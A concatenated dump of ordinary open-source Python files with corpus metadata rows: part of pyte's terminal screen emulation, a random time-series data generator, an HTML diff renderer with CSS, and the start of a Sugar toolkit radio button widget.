is at the first line, create a new line at the top.
"""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == top:
# TODO: mark only the lines within margins?
self.dirty.update(range(self.lines))
for y in range(bottom, top, -1):
self.buffer[y] = self.buffer[y - 1]
self.buffer.pop(top, None)
else:
self.cursor_up()
def linefeed(self):
"""Perform an index and, if :data:`~pyte.modes.LNM` is set, a
carriage return.
"""
self.index()
if mo.LNM in self.mode:
self.carriage_return()
def tab(self):
"""Move to the next tab space, or the end of the screen if there
aren't anymore left.
"""
for stop in sorted(self.tabstops):
if self.cursor.x < stop:
column = stop
break
else:
column = self.columns - 1
self.cursor.x = column
def backspace(self):
"""Move cursor to the left one or keep it in its position if
it's at the beginning of the line already.
"""
self.cursor_back()
def save_cursor(self):
"""Push the current cursor position onto the stack."""
self.savepoints.append(Savepoint(copy.copy(self.cursor),
self.g0_charset,
self.g1_charset,
self.charset,
mo.DECOM in self.mode,
mo.DECAWM in self.mode))
def restore_cursor(self):
"""Set the current cursor position to whatever cursor is on top
of the stack.
"""
if self.savepoints:
savepoint = self.savepoints.pop()
self.g0_charset = savepoint.g0_charset
self.g1_charset = savepoint.g1_charset
self.charset = savepoint.charset
if savepoint.origin:
self.set_mode(mo.DECOM)
if savepoint.wrap:
self.set_mode(mo.DECAWM)
self.cursor = savepoint.cursor
self.ensure_hbounds()
self.ensure_vbounds(use_margins=True)
else:
# If nothing was saved, the cursor moves to home position;
# origin mode is reset. :todo: DECAWM?
self.reset_mode(mo.DECOM)
self.cursor_position()
def insert_lines(self, count=None):
"""Insert the indicated # of lines at line with cursor. Lines
displayed **at** and below the cursor move down. Lines moved
past the bottom margin are lost.
:param count: number of lines to insert.
"""
count = count or 1
top, bottom = self.margins or Margins(0, self.lines - 1)
        # If the cursor is outside the scrolling margins -- do nothing.
if top <= self.cursor.y <= bottom:
self.dirty.update(range(self.cursor.y, self.lines))
for y in range(bottom, self.cursor.y - 1, -1):
if y + count <= bottom and y in self.buffer:
self.buffer[y + count] = self.buffer[y]
self.buffer.pop(y, None)
self.carriage_return()
def delete_lines(self, count=None):
"""Delete the indicated # of lines, starting at line with
cursor. As lines are deleted, lines displayed below cursor
move up. Lines added to bottom of screen have spaces with same
character attributes as last line moved up.
:param int count: number of lines to delete.
"""
count = count or 1
top, bottom = self.margins or Margins(0, self.lines - 1)
# If cursor is outside scrolling margins -- do nothin'.
if top <= self.cursor.y <= bottom:
self.dirty.update(range(self.cursor.y, self.lines))
for y in range(self.cursor.y, bottom + 1):
if y + count <= bottom:
if y + count in self.buffer:
self.buffer[y] = self.buffer.pop(y + count)
else:
self.buffer.pop(y, None)
self.carriage_return()
def insert_characters(self, count=None):
"""Insert the indicated # of blank characters at the cursor
position. The cursor does not move and remains at the beginning
of the inserted blank characters. Data on the line is shifted
forward.
:param int count: number of characters to insert.
"""
self.dirty.add(self.cursor.y)
count = count or 1
line = self.buffer[self.cursor.y]
for x in range(self.columns, self.cursor.x - 1, -1):
if x + count <= self.columns:
line[x + count] = line[x]
line.pop(x, None)
def delete_characters(self, count=None):
"""Delete the indicated # of characters, starting with the
character at cursor position. When a character is deleted, all
characters to the right of cursor move left. Character attributes
move with the characters.
:param int count: number of characters to delete.
"""
self.dirty.add(self.cursor.y)
count = count or 1
line = self.buffer[self.cursor.y]
for x in range(self.cursor.x, self.columns):
if x + count <= self.columns:
line[x] = line.pop(x + count, self.default_char)
else:
line.pop(x, None)
def erase_characters(self, count=None):
"""Erase the indicated # of characters, starting with the
character at cursor position. Character attributes are set
cursor attributes. The cursor remains in the same position.
:param int count: number of characters to erase.
.. note::
Using cursor attributes for character attributes may seem
           illogical, but if you recall that a terminal emulator emulates
           a typewriter, it starts to make sense. The only way a
           typewriter could erase a character is by typing over it.
"""
self.dirty.add(self.cursor.y)
count = count or 1
line = self.buffer[self.cursor.y]
for x in range(self.cursor.x,
min(self.cursor.x + count, self.columns)):
line[x] = self.cursor.attrs
def erase_in_line(self, how=0, private=False):
"""Erase a line in a specific way.
Character attributes are set to cursor attributes.
:param int how: defines the way the line should be erased in:
* ``0`` -- Erases from cursor to end of line, including cursor
position.
* ``1`` -- Erases from beginning of line to cursor,
including cursor position.
* ``2`` -- Erases complete line.
:param bool private: when ``True`` only characters marked as
eraseable are affected **not implemented**.
"""
self.dirty.add(self.cursor.y)
if how == 0:
interval = range(self.cursor.x, self.columns)
elif how == 1:
interval = range(self.cursor.x + 1)
elif how == 2:
interval = range(self.columns)
line = self.buffer[self.cursor.y]
for x in interval:
line[x] = self.cursor.attrs
def erase_in_display(self, how=0, private=False):
"""Erases display in a specific way.
Character attributes are set to cursor attributes.
:param int how: defines the way the line should be erased in:
* ``0`` -- Erases from cursor to end of screen, including
cursor position.
* ``1`` -- Erases from beginning of screen to cursor,
including cursor position.
* ``2`` and ``3`` -- Erases complete display. All lines
are erased and changed to single-width. Cursor does not
move.
:param bool private: when ``True`` only characters marked as
eraseable are affected **not implemented**.
"""
if how == 0:
interval = range(self.cursor.y + 1, self.lines)
elif how == 1:
interval = range(self.cursor.y)
elif how == 2 or how == 3:
interval = range(self.lines)
self.dirty.update(interval)
for y in interval:
line = self.buffer[y]
for x in line:
line[x] = self.cursor.attrs
if how == 0 or how == 1:
self.erase_in_line(how)
def set_tab_stop(self):
"""Set a horizontal tab stop at cursor position."""
self.tabstops.add(self.cursor.x)
def clear_tab_stop(self, how=0):
"""Clear a horizontal tab stop.
:param int how: defines a way the tab stop should be cleared:
* ``0`` or nothing -- Clears a horizontal tab stop at cursor
position.
* ``3`` -- Clears all horizontal tab stops.
"""
if how == 0:
# Clears a horizontal tab stop at cursor position, if it's
# present, or silently fails if otherwise.
self.tabstops.discard(self.cursor.x)
elif how == 3:
self.tabstops = set() # Clears all horizontal tab stops.
def ensure_hbounds(self):
"""Ensure the cursor is within horizontal screen bounds."""
self.cursor.x = min(max(0, self.cursor.x), self.columns - 1)
def ensure_vbounds(self, use_margins=None):
"""Ensure the cursor is within vertical screen bounds.
:param bool use_margins: when ``True`` or when
:data:`~pyte.modes.DECOM` is set,
                                 cursor is bounded by top and bottom
margins, instead of ``[0; lines - 1]``.
"""
if (use_margins or mo.DECOM in self.mode) and self.margins is not None:
top, bottom = self.margins
else:
top, bottom = 0, self.lines - 1
self.cursor.y = min(max(top, self.cursor.y), bottom)
def cursor_up(self, count=None):
"""Move cursor up the indicated # of lines in same column.
Cursor stops at top margin.
:param int count: number of lines to skip.
"""
top, _bottom = self.margins or Margins(0, self.lines - 1)
self.cursor.y = max(self.cursor.y - (count or 1), top)
def cursor_up1(self, count=None):
"""Move cursor up the indicated # of lines to column 1. Cursor
stops at bottom margin.
:param int count: number of lines to skip.
"""
self.cursor_up(count)
self.carriage_return()
def cursor_down(self, count=None):
"""Move cursor down the indicated # of lines in same column.
Cursor stops at bottom margin.
:param int count: number of lines to skip.
"""
_top, bottom = self.margins or Margins(0, self.lines - 1)
self.cursor.y = min(self.cursor.y + (count or 1), bottom)
def cursor_down1(self, count=None):
"""Move cursor down the indicated # of lines to column 1.
Cursor stops at bottom margin.
:param int count: number of lines to skip.
"""
self.cursor_down(count)
self.carriage_return()
def cursor_back(self, count=None):
"""Move cursor left the indicated # of columns. Cursor stops
at left margin.
:param int count: number of columns to skip.
"""
# Handle the case when we've just drawn in the last column
# and would wrap the line on the next :meth:`draw()` call.
if self.cursor.x == self.columns:
self.cursor.x -= 1
self.cursor.x -= count or 1
self.ensure_hbounds()
def cursor_forward(self, count=None):
"""Move cursor right the indicated # of columns. Cursor stops
at right margin.
:param int count: number of columns to skip.
"""
self.cursor.x += count or 1
self.ensure_hbounds()
def cursor_position(self, line=None, column=None):
"""Set the cursor to a specific `line` and `column`.
Cursor is allowed to move out of the scrolling region only when
:data:`~pyte.modes.DECOM` is reset, otherwise -- the position
doesn't change.
:param int line: line number to move the cursor to.
:param int column: column number to move the cursor to.
"""
column = (column or 1) - 1
line = (line or 1) - 1
        # If origin mode (DECOM) is set, line numbers are relative to
# the top scrolling margin.
if self.margins is not None and mo.DECOM in self.mode:
line += self.margins.top
# Cursor is not allowed to move out of the scrolling region.
if not self.margins.top <= line <= self.margins.bottom:
return
self.cursor.x = column
self.cursor.y = line
self.ensure_hbounds()
self.ensure_vbounds()
def cursor_to_column(self, column=None):
"""Move cursor to a specific column in the current line.
:param int column: column number to move the cursor to.
"""
self.cursor.x = (column or 1) - 1
self.ensure_hbounds()
def cursor_to_line(self, line=None):
"""Move cursor to a specific line in the current column.
:param int line: line number to move the cursor to.
"""
self.cursor.y = (line or 1) - 1
        # If origin mode (DECOM) is set, line numbers are relative to
# the top scrolling margin.
if mo.DECOM in self.mode:
self.cursor.y += self.margins.top
# FIXME: should we also restrict the cursor to the scrolling
# region?
self.ensure_vbounds()
def bell(self, *args):
"""Bell stub -- the actual implementation should probably be
provided by the end-user.
"""
def alignment_display(self):
"""Fills screen with uppercase E's for screen focus and alignment."""
self.dirty.update(range(self.lines))
for y in range(self.lines):
for x in range(self.columns):
self.buffer[y][x] = self.buffer[y][x]._replace(data="E")
def select_graphic_rendition(self, *attrs):
"""Set display attributes.
:param list attrs: a list of display attributes to set.
"""
replace = {}
# Fast path for resetting all attributes.
if not attrs or attrs == (0, ):
self.cursor.attrs = self.default_char
return
else:
attrs = list(reversed(attrs))
while attrs:
attr = attrs.pop()
if attr == 0:
# Reset all attributes.
replace.update(self.default_char._asdict())
elif attr in g.FG_ANSI:
replace["fg"] = g.FG_ANSI[attr]
elif attr in g.BG:
replace["bg"] = g.BG_ANSI[attr]
elif attr in g.TEXT:
attr = g.TEXT[attr]
replace[attr[1:]] = attr.startswith("+")
elif attr in g.FG_AIXTERM:
replace.update(fg=g.FG_AIXTERM[attr], bold=True)
elif attr in g.BG_AIXTERM:
replace.update(bg=g.BG_AIXTERM[attr], bold=True)
elif attr in (g.FG_256, g.BG_256):
key = "fg" if attr == g.FG_256 else "bg"
try:
n = attrs.pop()
if n == 5: # 256.
m = attrs.pop()
replace[key] = g.FG_BG_256[m]
elif n == 2: # 24bit.
# This is somewhat non-standard but is nonetheless
# supported in quite a few terminals. See discussion
# here https://gist.github.com/XVilka/8346728.
replace[key] = "{0:02x}{1:02x}{2:02x}".format(
attrs.pop(), attrs.pop(), attrs.pop())
except IndexError:
pass
self.cursor.attrs = self.cursor.attrs._replace(**replace)
def report_device_attributes(self, mode=0, **kwargs):
"""Report terminal identity.
.. versionadded:: 0.5.0
.. versionchanged:: 0.7.0
If ``private`` keyword argument is set, the method does nothing.
This behaviour is consistent with VT220 manual.
"""
# We only implement "primary" DA which is the only DA request
# VT102 understood, see ``VT102ID`` in ``linux/drivers/tty/vt.c``.
if mode == 0 and not kwargs.get("private"):
self.write_process_input(ctrl.CSI + "?6c")
def report_device_status(self, mode):
"""Report terminal status or cursor position.
:param int mode: if 5 -- terminal status, 6 -- cursor position,
otherwise a noop.
.. versionadded:: 0.5.0
"""
if mode == 5: # Request for terminal status.
self.write_process_input(ctrl.CSI + "0n")
elif mode == 6: # Request for cursor position.
x = self.cursor.x + 1
y = self.cursor.y + 1
# "Origin mode (DECOM) selects line numbering."
if mo.DECOM in self.mode:
y -= self.margins.top
self.write_process_input(ctrl.CSI + "{0};{1}R".format(y, x))
def write_process_input(self, data):
"""Write data to the process running inside the terminal.
By default is a noop.
:param str data: text to write to the process ``stdin``.
.. versionadded:: 0.5.0
"""
def debug(self, *args, **kwargs):
"""Endpoint for unrecognized escape sequences.
By default is a noop.
"""
class DiffScreen(Screen):
"""
A screen subclass, which maintains a set of dirty lines in its
:attr:`dirty` attribute. The end user is responsible for emptying
a set, when a diff is applied.
.. deprecated:: 0.7.0
The functionality contained in this class has been merged into
:class:`~pyte.screens.Screen` and will be removed in 0.8.0.
Please update your code accordingly.
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"The functionality of ``DiffScreen` has been merged into "
"``Screen`` and will be removed in 0.8.0. Please update "
"your code accordingly.", DeprecationWarning)
super(DiffScreen, self).__init__(*args, **kwargs)
History = namedtuple("History", "top bottom ratio size position")
class HistoryScreen(Screen):
"""A :class:~`pyte.screens.Screen` subclass, which keeps track
of screen history and allows pagination. This is not linux-specific,
but still useful; see page 462 of VT520 User's Manual.
:param int history: total number of history lines to keep; is split
between top and bottom queues.
:param int ratio: defines how much lines to scroll on :meth:`next_page`
and :meth:`prev_page` calls.
.. attribute:: history
A pair of history queues for top and bottom margins accordingly;
here's the overall screen structure::
[ 1: .......]
[ 2: .......] <- top history
[ 3: .......]
------------
[ 4: .......] s
[ 5: .......] c
[ 6: .......] r
[ 7: .......] e
[ 8: .......] e
[ 9: .......] n
------------
[10: .......]
[11: .......] <- bottom history
[12: .......]
.. note::
Don't forget to update :class:`~pyte.streams.Stream` class with
appropriate escape sequences -- you can use any, since pagination
protocol is not standardized, for example::
Stream.escape["N"] = "next_page"
Stream.escape["P"] = "prev_page"
"""
_wrapped = set(Stream.events)
_wrapped.update(["next_page", "prev_page"])
def __init__(self, columns, lines, history=100, ratio=.5):
self.history = History(deque(maxlen=history),
deque(maxlen=history),
float(ratio),
history,
history)
super(HistoryScreen, self).__init__(columns, lines)
def _make_wrapper(self, event, handler):
def inner(*args, **kwargs):
self.before_event(event)
result = handler(*args, **kwargs)
self.after_event(event)
return result
return inner
def __getattribute__(self, attr):
value = super(HistoryScreen, self).__getattribute__(attr)
if attr in HistoryScreen._wrapped:
return HistoryScreen._make_wrapper(self, attr, value)
else:
return value
def before_event(self, event):
"""Ensure a screen is at the bottom of the history buffer.
:param str event: event name, for example ``"linefeed"``.
"""
if event not in ["prev_page", "next_page"]:
while self.history.position < self.history.size:
self.next_page()
def after_event(self, event):
"""Ensure all lines on a screen have proper width (:attr:`columns`).
Extra characters are truncated, missing characters are filled
with whitespace.
:param str event: event name, for example ``"linefeed"``.
"""
if event in ["prev_page", "next_page"]:
for line in self.buffer.values():
for x in line:
if x > self.columns:
line.pop(x)
# If we're at the bottom of the history buffer and `DECTCEM`
# mode is set -- show the cursor.
self.cursor.hidden = not (
self.history.position == self.history.size and
mo.DECTCEM in self.mode
)
def _reset_history(self):
self.history.top.clear()
self.history.bottom.clear()
self.history = self.history._replace(position=self.history.size)
def reset(self):
"""Overloaded to reset screen history state: history position
is reset to bottom of both queues; queues themselves are
emptied.
"""
super(HistoryScreen, self).reset()
self._reset_history()
def erase_in_display(self, how=0):
"""Overloaded to reset history state."""
super(HistoryScreen, self).erase_in_display(how)
if how == 3:
self._reset_history()
def index(self):
"""Overloaded to update top history with the removed lines."""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == bottom:
self.history.top.append(self.buffer[top])
super(HistoryScreen, self).index()
def reverse_index(self):
"""Overloaded to update bottom history with the removed lines."""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == top:
self.history.bottom.append(self.buffer[bottom])
super(HistoryScreen, self).reverse_index()
def prev_page(self):
"""Move the screen page up through the history buffer. Page
size is defined by ``history.ratio``, so for instance
``ratio = .5`` means that half the screen is restored from
history on page switch.
"""
if self.history.position > self.lines and self.history.top:
mid = min(len(self.history.top),
int(math.ceil(self.lines * self.history.ratio)))
self.history.bottom.extendleft(
self.buffer[y]
for y in range(self.lines - 1, self.lines - mid - 1, -1))
self.history = self.history \
._replace(position=self.history.position - mid)
for y in range(self.lines - 1, mid - 1, -1):
self.buffer[y] = self.buffer[y - mid]
for y in range(mid - 1, -1, -1):
self.buffer[y] = self.history.top.pop()
self.dirty = set(range(self.lines))
def next_page(self):
"""Move the screen page down through the history buffer."""
if self.history.position < self.history.size and self.history.bottom:
mid = min(len(self.history.bottom),
int(math.ceil(self.lines * self.history.ratio)))
self.history.top.extend(self.buffer[y] for y in range(mid))
self.history = self.history \
._replace(position=self.history.position + mid)
for y in range(self.lines - mid):
self.buffer[y] = self.buffer[y + mid]
for y in range(self.lines - mid, self.lines):
self.buffer[y] = self.history.bottom.popleft()
self.dirty = set(range(self.lines))
class DebugEvent(namedtuple("Event", "name args kwargs")):
"""Event dispatched to :class:`~pyte.screens.DebugScreen`.
.. warning::
This is developer API with no backward compatibility guarantees.
Use at your own risk!
"""
@staticmethod
def from_string(line):
return DebugEvent(*json.loads(line))
def __str__(self):
return json.dumps(self)
def __call__(self, screen):
"""Execute this event on a given ``screen``."""
return getattr(screen, self.name)(*self.args, **self.kwargs)
class DebugScreen(object):
r"""A screen which dumps a subset of the received events to a file.
>>> import io
>>> with io.StringIO() as buf:
... stream = Stream(DebugScreen(to=buf))
... stream.feed("\x1b[1;24r\x1b[4l\x1b[24;1H\x1b[0;10m")
... print(buf.getvalue())
...
... # doctest: +NORMALIZE_WHITESPACE
["set_margins", [1, 24], {}]
["reset_mode", [4], {}]
["cursor_position", [24, 1], {}]
["select_graphic_rendition", [0, 10], {}]
:param file to: a file-like object to write debug information to.
:param list only: a list of events you want to debug (empty by
default, which means -- debug all events).
.. warning::
This is developer API with no backward compatibility guarantees.
Use at your own risk!
"""
def __init__(self, to=sys.stderr, only=()):
self.to = to
self.only = only
def only_wrapper(self, attr):
def wrapper(*args, **kwargs):
self.to.write(str(DebugEvent(attr, args, kwargs)))
self.to.write(str(os.linesep))
return wrapper
def __getattribute__(self, attr):
if attr not in Stream.events:
return super(DebugScreen, self).__getattribute__(attr)
elif not self.only or attr in self.only:
return self.only_wrapper(attr)
else:
return lambda *args, **kwargs: None
| mit | 3,143,114,599,980,431,000 | 34.434091 | 79 | 0.564834 | false | 4.160559 | false | false | false |
suraj-jayakumar/lstm-rnn-ad | src/testdata/random_data_time_series/generate_data.py | 1 | 1042 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 23 11:15:12 2016
@author: suraj
"""
import random
import numpy as np
import pickle
import matplotlib.pyplot as plt
attachRateList = []
for i in range(3360):
attachRateList.append(random.uniform(4,6))
attachRateList = np.array(attachRateList)
encoded_attach_rate_list = np.fft.fft(attachRateList)
day_number_list = [i%7 for i in range(3360)]
encoded_day_number_list = np.fft.fft(day_number_list)
time_number_list = [i%96 for i in range(3360)]
encoded_time_number_list = np.fft.fft(time_number_list)
final_list_x = np.array([[encoded_day_number_list.real[i],encoded_day_number_list.imag[i],encoded_time_number_list.real[i],encoded_time_number_list.imag[i],encoded_attach_rate_list.real[i],encoded_attach_rate_list.imag[i]] for i in range(3360)])
final_list_y = [ (encoded_attach_rate_list[i].real,encoded_attach_rate_list[i].imag) for i in range(len(encoded_attach_rate_list)) ]
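# Shape notes (derived from the code above): final_list_x is a (3360, 6) array
# of [day.real, day.imag, time.real, time.imag, attach.real, attach.imag] rows;
# final_list_y pairs the real and imaginary parts of the FFT-encoded attach rate.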
pickle.dump(final_list_x,open('x_att.p','wb'))
pickle.dump(final_list_y,open('y_att.p','wb'))
| apache-2.0 | -7,580,691,378,354,332,000 | 23.809524 | 245 | 0.716891 | false | 2.713542 | false | false | false |
kalyptorisk/daversy | src/daversy/difflib_ext.py | 1 | 8527 | import re, difflib
def merge_group(list, func, start=True, end=True):
l, r, s = list[0]
first = ['',' class="first"'][start]
last = ['',' class="last"'][end]
if len(list) == 1:
if start and end:
return LINE_FORMAT % func(' class="first last"', l, r)
else:
return LINE_FORMAT % func(first+last, l, r)
html = LINE_FORMAT % func(first, l, r)
for i in range(1, len(list)-1):
l, r, s = list[i]
html += LINE_FORMAT % func('', l, r)
l, r, s = list[-1]
html += LINE_FORMAT % func(last, l, r)
return html
def make_table(table_id, header, fromlines, tolines, context=None, versions=['old', 'new']):
diff = list(difflib._mdiff(fromlines, tolines, context))
if not diff:
return None
same = lambda c, l, r: (c, l[0], r[0], 'l', format_line(l[1]))
add = lambda c, l, r: (c, '', r[0], 'r', format_line(r[1]))
sub = lambda c, l, r: (c, l[0], '', 'l', format_line(l[1]))
html = TABLE_HEADER % tuple([table_id, header] + versions)
for type, start, end in group_types(diff):
if type == 'same':
html += '<tbody>%s</tbody>\n' % \
merge_group(diff[start:end], same)
elif type == 'add':
html += '<tbody class="add">%s</tbody>\n' % \
merge_group(diff[start:end], add)
elif type == 'del':
html += '<tbody class="rem">%s</tbody>\n' % \
merge_group(diff[start:end], sub)
elif type == 'mod':
html += '<tbody class="mod">%s%s</tbody>\n' % \
(merge_group(diff[start:end], sub, end=False),
merge_group(diff[start:end], add, start=False))
elif type == 'skipped':
html += '<tbody class="skipped"><tr><th>...</th><th>...</th><td> </td></tr></tbody>\n'
html += TABLE_FOOTER
return html
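# Example usage (illustrative; the file names are hypothetical):
#
#     old = open('a.sql').readlines()
#     new = open('b.sql').readlines()
#     html = make_table('diff-1', 'MY_TABLE', old, new, context=3,
#                       versions=['r1', 'r2'])
#     # make_table returns None when the two inputs produce an empty diff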
def get_type(left, right, status):
if not status:
if left or right:
return 'same'
else:
return 'skipped'
l_num, l_line = left
r_num, r_line = right
if l_num and not r_num:
return 'del'
elif r_num and not l_num:
return 'add'
else:
return 'mod'
def group_types(diff):
items = [get_type(l,r,s) for l,r,s in diff]
group = []
if not items:
print diff
start, current = 0, items[0]
for i in range(1, len(diff)):
if items[i] != current:
group.append( (current, start, i) )
current = items[i]
start = i
group.append( (current, start, len(diff)) )
return group
REPLACE_CHARS = [
    ('&', '&amp;'),
    ('<', '&lt;'),
    ('>', '&gt;'),
    (' ', '&nbsp;'),
    ('"', '&quot;'),
    ('\0+', '<span class="ins">'),
    ('\0-', '<span class="del">'),
    ('\0^', '<span class="chg">'),
    ('\1', '</span>')
]
SINGLE_CHANGE = re.compile("^\0[\+\-\^]([^\0]+)\1\n?$")
def format_line(text):
text = text.replace('\n', '')
match = SINGLE_CHANGE.match(text)
if match:
text = match.group(1)
for src, replace in REPLACE_CHARS:
text = text.replace(src, replace)
return text
## the majority of the CSS and markup has been used from Trac
TABLE_HEADER = """
<li class='entry' id='%s'>
<h2>%s</h2>
<table class="inline" summary="Differences" cellspacing="0">
<colgroup><col class="lineno" /><col class="lineno" /><col class="content" /></colgroup>
<thead><th>%s</th><th>%s</th><th> </th></thead>
"""
TABLE_FOOTER = """
</table>
</li>
"""
LINE_FORMAT = "<tr%s><th>%s</th><th>%s</th><td class='%s'><span>%s</span> </td></tr>"
HTML_HEADER = """
<html><head><style type='text/css'>
/* Diff preferences */
#prefs fieldset { margin: 1em .5em .5em; padding: .5em 1em 0 }
/* Diff/change overview */
#overview {
line-height: 130%;
margin-top: 1em;
padding: .5em;
}
#overview dt {
font-weight: bold;
padding-right: .25em;
position: absolute;
left: 0;
text-align: right;
width: 7.75em;
}
#overview dd { margin-left: 8em }
/* Colors for change types */
#chglist .edit, #overview .mod, .diff #legend .mod { background: #fd8 }
#chglist .delete, #overview .rem, .diff #legend .rem { background: #f88 }
#chglist .add, #overview .add, .diff #legend .add { background: #bfb }
#chglist .copy, #overview .cp, .diff #legend .cp { background: #88f }
#chglist .move, #overview .mv, .diff #legend .mv { background: #ccc }
#chglist .unknown { background: #fff }
/* Legend for diff colors */
.diff #legend {
float: left;
font-size: 9px;
line-height: 1em;
margin: 1em 0;
padding: .5em;
}
.diff #legend h3 { display: none; }
.diff #legend dt {
background: #fff;
border: 1px solid #999;
float: left;
margin: .1em .5em .1em 2em;
overflow: hidden;
width: .8em; height: .8em;
}
.diff #legend dl, .diff #legend dd {
display: inline;
float: left;
padding: 0;
margin: 0;
margin-right: .5em;
}
/* Styles for the list of diffs */
.diff ul.entries { clear: both; margin: 0; padding: 0 }
.diff li.entry {
background: #f7f7f7;
border: 1px solid #d7d7d7;
list-style-type: none;
margin: 0 0 2em;
padding: 2px;
position: relative;
}
.diff h2 {
color: #333;
font-size: 14px;
letter-spacing: normal;
margin: 0 auto;
padding: .1em 0 .25em .5em;
}
/* Styles for the actual diff tables (side-by-side and inline) */
.diff table {
border: 1px solid #ddd;
border-spacing: 0;
border-top: 0;
empty-cells: show;
font-size: 12px;
line-height: 130%;
padding: 0;
margin: 0 auto;
width: 100%;
}
.diff table col.lineno { width: 4em }
.diff table th {
border-right: 1px solid #d7d7d7;
border-bottom: 1px solid #998;
font-size: 11px;
}
.diff table thead th {
background: #eee;
border-top: 1px solid #d7d7d7;
color: #999;
padding: 0 .25em;
text-align: center;
white-space: nowrap;
}
.diff table tbody th {
background: #eed;
color: #886;
font-weight: normal;
padding: 0 .5em;
text-align: right;
vertical-align: top;
}
.diff table tbody td {
background: #fff;
font: normal 11px monospace;
overflow: hidden;
padding: 1px 2px;
vertical-align: top;
}
.diff table tbody.skipped td {
background: #f7f7f7;
border: 1px solid #d7d7d7;
}
.diff table td span.del, .diff table td span.ins { text-decoration: none }
.diff table td span.del { color: #600 }
.diff table td span.ins { color: #060 }
/* Styles for the inline diff */
.diff table.inline tbody.mod td.l, .diff table.inline tbody.rem td.l {
background: #fdd;
border-color: #c00;
border-style: solid;
border-width: 0 1px 0 1px;
}
.diff table.inline tbody.mod td.r, .diff table.inline tbody.add td.r {
background: #dfd;
border-color: #0a0;
border-style: solid;
border-width: 0 1px 0 1px;
}
.diff table.inline tbody.mod tr.first td.l,
.diff table.inline tbody.rem tr.first td.l { border-top-width: 1px }
.diff table.inline tbody.mod tr.last td.l,
.diff table.inline tbody.rem tr.last td.l { border-bottom-width: 1px }
.diff table.inline tbody.mod tr.first td.r,
.diff table.inline tbody.add tr.first td.r { border-top-width: 1px }
.diff table.inline tbody.mod tr.last td.r,
.diff table.inline tbody.add tr.last td.r { border-bottom-width: 1px }
.diff table.inline tbody.mod td span.del { background: #e99; color: #000 }
.diff table.inline tbody.mod td span.ins { background: #9e9; color: #000 }
.diff table.inline tbody.mod td span.chg { background: #ee9; color: #000 }
/* Styles for the side-by-side diff */
.diff table.sidebyside colgroup.content { width: 50% }
.diff table.sidebyside tbody.mod td.l { background: #fe9 }
.diff table.sidebyside tbody.mod td.r { background: #fd8 }
.diff table.sidebyside tbody.add td.l { background: #dfd }
.diff table.sidebyside tbody.add td.r { background: #cfc }
.diff table.sidebyside tbody.rem td.l { background: #f88 }
.diff table.sidebyside tbody.rem td.r { background: #faa }
.diff table.sidebyside tbody.mod span.del, .diff table.sidebyside tbody.mod span.ins, .diff table.sidebyside tbody.mod span.chg {
background: #fc0;
}
/* Changeset overview */
#overview .files { padding-top: 2em }
#overview .files ul { margin: 0; padding: 0 }
#overview .files li { list-style-type: none }
#overview .files li .comment { display: none }
#overview .files li div {
border: 1px solid #999;
float: left;
margin: .2em .5em 0 0;
overflow: hidden;
width: .8em; height: .8em;
}
#overview div.add div, #overview div.cp div, #overview div.mv div {
border: 0;
margin: 0;
float: right;
width: .35em;
}
span.ver {font: normal 11px monospace;}
</style></head><body>
"""
HTML_FOOTER = """
</body>
</html>
"""
| gpl-2.0 | -9,172,895,471,794,657,000 | 26.156051 | 129 | 0.606661 | false | 2.854704 | false | false | false |
sugarlabs/sugar-toolkit-gtk3 | src/sugar3/graphics/radiotoolbutton.py | 1 | 7756 | # Copyright (C) 2007, Red Hat, Inc.
# Copyright (C) 2007-2008, One Laptop Per Child
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
'''
Provides a RadioToolButton class, similar to a "push" button.
A group of RadioToolButtons can be set, so that only one can be
selected at a time. When a button is clicked, it depresses and
is shaded darker.
It is also possible to set a tooltip to be displayed when the
user scrolls over it with their cursor as well as an accelerator
keyboard shortcut.
Example:
.. literalinclude:: ../examples/radiotoolbutton.py
'''
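# A minimal sketch of a two-button group (illustrative only; ``toolbar`` is
# assumed to be an existing Gtk.Toolbar in the calling activity):
#
#     left = RadioToolButton(icon_name='format-justify-left')
#     left.props.tooltip = 'Align left'
#     center = RadioToolButton(icon_name='format-justify-center', group=left)
#     center.props.tooltip = 'Align center'
#     toolbar.insert(left, -1)
#     toolbar.insert(center, -1)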
from gi.repository import Gtk
from gi.repository import GObject
from sugar3.graphics.icon import Icon
from sugar3.graphics.palette import Palette, ToolInvoker
from sugar3.graphics import toolbutton
class RadioToolButton(Gtk.RadioToolButton):
'''
The RadioToolButton class manages a Gtk.RadioToolButton styled for
Sugar.
Args:
icon_name (string): name of icon to be used.
Keyword Args:
accelerator (string): keyboard shortcut to be used to
activate this button.
tooltip (string): tooltip to be displayed when user hovers
over button.
xo_color (sugar3.graphics.xocolor.XoColor): XoColor of button.
hide_tooltip_on_click (bool): Whether or not the tooltip
is hidden when user clicks on button.
'''
__gtype_name__ = 'SugarRadioToolButton'
def __init__(self, icon_name=None, **kwargs):
self._accelerator = None
self._tooltip = None
self._xo_color = None
self._hide_tooltip_on_click = True
self._palette_invoker = ToolInvoker()
GObject.GObject.__init__(self, **kwargs)
self._palette_invoker.attach_tool(self)
if icon_name:
self.set_icon_name(icon_name)
# HACK: stop Gtk from adding a label and expanding the size of
        # the button. This happens when set_icon_widget is called
# if label_widget is None
self.props.label_widget = Gtk.Box()
self.connect('destroy', self.__destroy_cb)
def __destroy_cb(self, icon):
if self._palette_invoker is not None:
self._palette_invoker.detach()
def set_tooltip(self, tooltip):
'''
Set the tooltip.
Args:
tooltip (string): tooltip to be set.
'''
if self.palette is None or self._tooltip is None:
self.palette = Palette(tooltip)
elif self.palette is not None:
self.palette.set_primary_text(tooltip)
self._tooltip = tooltip
# Set label, shows up when toolbar overflows
Gtk.RadioToolButton.set_label(self, tooltip)
def get_tooltip(self):
'''
Return the tooltip.
'''
return self._tooltip
tooltip = GObject.Property(type=str, setter=set_tooltip,
getter=get_tooltip)
